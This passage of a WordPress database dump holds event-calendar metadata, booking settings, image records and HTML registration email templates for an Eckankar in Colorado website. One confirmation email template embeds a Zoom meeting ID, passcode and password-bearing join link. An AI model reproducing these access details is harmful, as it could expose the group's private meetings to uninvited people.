scount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(162164,266715,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(162165,266715,'mec_fees_global_inheritance','1'),(162166,266715,'mec_fees','a:0:{}'),(162167,266715,'mec_ticket_variations_global_inheritance','1'),(162168,266715,'mec_ticket_variations','a:0:{}'),(162169,266715,'mec_reg_fields_global_inheritance','1'),(162170,266715,'mec_reg_fields','a:0:{}'),(162171,266715,'mec_bfixed_fields','a:0:{}'),(162172,266715,'mec_op','a:0:{}'),(162173,266715,'mec_fields','a:0:{}'),(162174,266715,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6154:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4812:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(162175,266715,'mec_event_status','EventScheduled'),(162176,266715,'mec_moved_online_link',''),(162177,266715,'mec_cancelled_reason',''),(162178,266715,'mec_display_cancellation_reason_in_single_page',''),(162179,266715,'protect_children',''),(162180,266715,'passster_activate_global_protection',NULL),(162181,266715,'passster_activate_protection',NULL),(162182,266715,'passster_protection_type','password'),(162183,266715,'boldgrid_hide_page_title','0'),(162184,266715,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(162185,266715,'boldgrid_in_page_containers','1'),(162188,266715,'_dp_original','266540'),(162187,266715,'_thumbnail_id','266716'),(162189,266715,'_edit_lock','1653842517:15'),(162190,266715,'_edit_last','2'),(162191,266716,'_wp_attached_file','2022/05/ruins-2.jpg'),(162192,266716,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:802;s:6:\"height\";i:451;s:4:\"file\";s:19:\"2022/05/ruins-2.jpg\";s:8:\"filesize\";i:89811;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"ruins-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18439;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"ruins-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9553;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"ruins-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72117;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:19:\"ruins-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27291;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:19:\"ruins-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41328;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:19:\"ruins-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30506;}s:8:\"tileview\";a:5:{s:4:\"file\";s:19:\"ruins-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30763;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(163286,266281,'_wp_old_date','2022-05-28'),(163284,247332,'_wp_old_date','2022-05-28'),(177219,267955,'mec_attention_time_start','1676197800'),(177220,267955,'mec_attention_time_end','1676244600'),(163274,247345,'_wp_old_date','2022-05-28'),(163270,247344,'_wp_old_date','2022-05-28'),(163268,247343,'_wp_old_date','2022-05-28'),(163266,261921,'_wp_old_date','2022-05-28'),(163264,247342,'_wp_old_date','2022-05-28'),(163254,264903,'_wp_old_date','2022-05-28'),(163256,264902,'_wp_old_date','2022-05-28'),(163258,264901,'_wp_old_date','2022-05-28'),(163252,265030,'_wp_old_date','2022-05-28'),(163250,247336,'_wp_old_date','2022-05-28'),(163248,247330,'_wp_old_date','2022-05-28'),(162215,266719,'protect_children',''),(162216,266719,'mec_color',''),(162217,266719,'mec_location_id','131'),(162218,266719,'mec_dont_show_map','0'),(162219,266719,'mec_organizer_id','1'),(162220,266719,'mec_read_more',''),(162221,266719,'mec_more_info',''),(162222,266719,'mec_more_info_title',''),(162223,266719,'mec_more_info_target','_self'),(162224,266719,'mec_cost',''),(162225,266719,'mec_currency','a:0:{}'),(162226,266719,'mec_additional_organizer_ids','a:0:{}'),(162227,266719,'mec_additional_location_ids','a:0:{}'),(162228,266719,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-06-26\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-06-26\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(162229,266719,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(162230,266719,'mec_certain_weekdays','a:0:{}'),(162231,266719,'mec_allday','0'),(162232,266719,'one_occurrence','0'),(162233,266719,'mec_hide_time','0'),(162234,266719,'mec_hide_end_time','0'),(162235,266719,'mec_comment',''),(162236,266719,'mec_timezone','global'),(162237,266719,'mec_countdown_method','global'),(162238,266719,'mec_public','1'),(162239,266719,'mec_start_date','2022-06-26'),(162240,266719,'mec_start_time_hour','1'),(162241,266719,'mec_start_time_minutes','0'),(162242,266719,'mec_start_time_ampm','PM'),(162243,266719,'mec_start_day_seconds','46800'),(162244,266719,'mec_end_date','2022-06-26'),(162245,266719,'mec_end_time_hour','2'),(162246,266719,'mec_end_time_minutes','30'),(162247,266719,'mec_end_time_ampm','PM'),(162248,266719,'mec_end_day_seconds','52200'),(162249,266719,'mec_repeat_status','0'),(162250,266719,'mec_repeat_type',''),(162251,266719,'mec_repeat_interval','1'),(162252,266719,'mec_repeat_end',''),(162253,266719,'mec_repeat_end_at_occurrences',''),(162254,266719,'mec_repeat_end_at_date',''),(162255,266719,'mec_advanced_days','a:0:{}'),(162256,266719,'mec_in_days',''),(162257,266719,'mec_not_in_days',''),(162258,266719,'mec_hourly_schedules','a:0:{}'),(162259,266719,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(162260,266719,'mec_tickets','a:0:{}'),(162261,266719,'mec_fees_global_inheritance','1'),(162262,266719,'mec_fees','a:0:{}'),(162263,266719,'mec_ticket_variations_global_inheritance','1'),(162264,266719,'mec_ticket_variations','a:0:{}'),(162265,266719,'mec_reg_fields_global_inheritance','1'),(162266,266719,'mec_reg_fields','a:0:{}'),(162267,266719,'mec_bfixed_fields','a:0:{}'),(162268,266719,'mec_op','a:0:{}'),(162269,266719,'mec_fields','a:0:{}'),(162270,266719,'mec_event_status','EventScheduled'),(162271,266719,'mec_moved_online_link',''),(162272,266719,'mec_cancelled_reason',''),(162273,266719,'mec_display_cancellation_reason_in_single_page',''),(162274,266719,'boldgrid_hide_page_title','0'),(162275,266719,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(162276,266719,'passster_activate_global_protection',NULL),(162277,266719,'passster_activate_protection',NULL),(162278,266719,'passster_protection_type','password'),(162279,266719,'boldgrid_in_page_containers','1'),(162280,266719,'_dp_original','265240'),(162281,266719,'_edit_lock','1653587209:2'),(162282,266719,'_edit_last','2'),(162283,266720,'_wp_attached_file','2022/05/hu-water-1.jpg'),(162284,266720,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:706;s:6:\"height\";i:397;s:4:\"file\";s:22:\"2022/05/hu-water-1.jpg\";s:8:\"filesize\";i:75124;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"hu-water-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14267;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"hu-water-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6686;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"hu-water-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21126;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"hu-water-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34394;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"hu-water-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24323;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"hu-water-1-300x397.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:397;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29963;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(162285,266719,'_thumbnail_id','266720'),(162286,266716,'original-file','2022/05/ruins-2-updraft-pre-smush-original.jpg'),(162287,266716,'smush-complete','1'),(162288,266716,'smush-info','The file was compressed from 87.71 KB to 84.48 KB saving 3.68 percent using WP-Optimize'),(162289,266716,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:89811;s:12:\"smushed-size\";i:86506;s:15:\"savings-percent\";d:3.68;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:89811;s:10:\"compressed\";i:86506;}s:6:\"medium\";a:2:{s:8:\"original\";i:18439;s:10:\"compressed\";i:18073;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9553;s:10:\"compressed\";i:9487;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:72117;s:10:\"compressed\";i:70975;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:27291;s:10:\"compressed\";i:26782;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:41328;s:10:\"compressed\";i:40632;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:30506;s:10:\"compressed\";i:29925;}s:8:\"tileview\";a:2:{s:8:\"original\";i:30763;s:10:\"compressed\";i:30394;}}}'),(162290,266720,'original-file','2022/05/hu-water-1-updraft-pre-smush-original.jpg'),(162291,266720,'smush-complete','1'),(162292,266720,'smush-info','The file was compressed from 73.36 KB to 69.68 KB saving 5.02 percent using WP-Optimize'),(162293,266720,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:75124;s:12:\"smushed-size\";i:71356;s:15:\"savings-percent\";d:5.02;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:75124;s:10:\"compressed\";i:71356;}s:6:\"medium\";a:2:{s:8:\"original\";i:14267;s:10:\"compressed\";i:14039;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6686;s:10:\"compressed\";i:6620;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:21126;s:10:\"compressed\";i:20802;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:34394;s:10:\"compressed\";i:33774;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24323;s:10:\"compressed\";i:23918;}s:8:\"tileview\";a:2:{s:8:\"original\";i:29963;s:10:\"compressed\";i:29261;}}}'),(162294,266719,'_wp_old_slug','meetup-in-persontitle-goes-here-template'),(162295,266722,'protect_children',''),(162296,266722,'mec_color',''),(162297,266722,'mec_location_id','118'),(162298,266722,'mec_dont_show_map','0'),(162299,266722,'mec_organizer_id','1'),(162300,266722,'mec_read_more',''),(162301,266722,'mec_more_info',''),(162302,266722,'mec_more_info_title',''),(162303,266722,'mec_more_info_target','_self'),(162304,266722,'mec_cost',''),(162305,266722,'mec_currency','a:0:{}'),(162306,266722,'mec_additional_organizer_ids','a:0:{}'),(162307,266722,'mec_additional_location_ids','a:0:{}'),(162308,266722,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-06-10\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-06-10\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_o